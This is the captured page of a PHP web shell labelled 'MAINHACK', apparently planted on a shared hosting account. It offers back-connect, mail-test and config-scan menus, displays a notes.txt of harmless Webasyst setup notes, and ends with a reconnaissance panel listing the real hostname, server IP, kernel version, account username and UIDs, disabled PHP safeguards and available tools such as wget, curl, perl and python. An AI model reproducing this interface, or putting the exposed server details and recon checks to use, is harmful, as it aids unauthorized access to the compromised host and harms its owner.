[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: notes.txt
File is not writable. Editing disabled.
1. make package by extracting zip of wa-sources 2. PHP REQUIREMENT LINK : https://developers.webasyst.com/installation/ and also check /wa-installer/lib/config/requirements.php 3. Keep default timestamp and regtime values in `wa_widget_params` table. 4. From sql we remove 'token_data', 'waid_endpoints_sync_time, updates_endpoints_sync_time, services_endpoints_sync_time entry' from 'wa_app_settings' since it is made when we visit 'Installer'(from admin panel). Remove inserts from 'wa_log' table as well. Remove 'waid_credentials' from 'wa_app_settings', This is regenerated from admin panel under Settings->Enable Webasyst Id. Also remove insert from 'wa_contact_auths' as it is created again post login. 5. Important : We have configured .htaccess in the root folder i.e add following changes at the end of the file(Required for Configuring Apache + FastCGI for Webasyst https://developers.webasyst.com/docs/installation/tips/apache-fastcgi/) : <ifmodule mod_rewrite.c> RewriteEngine On RewriteRule .* - [E=HTTP_AUTHORIZATION:%{HTTP:Authorization},L] </ifmodule> This is needed for apps to work correctly on Apache + FastCGI and since we encountered error on 'CRM' tab i.e 'Authorization issue detected' and it was fixed by adding the above lines to .htaccess in root as mentioned in their docs.
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: server306.web-hosting.com
Server IP: 192.64.117.220
PHP Version: 8.2.31
Server Software: LiteSpeed
System: Linux server306.web-hosting.com 4.18.0-553.45.1.lve.el8.x86_64 #1 SMP Wed Mar 26 12:08:09 UTC 2025 x86_64
HDD Total: 138.28 GB
HDD Free: 101.75 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
No
pkexec:
No
git:
Yes
User Info
Username: awodbsau
User ID (UID): 4522
Group ID (GID): 4521
Script Owner UID: 4522
Current Dir Owner: N/A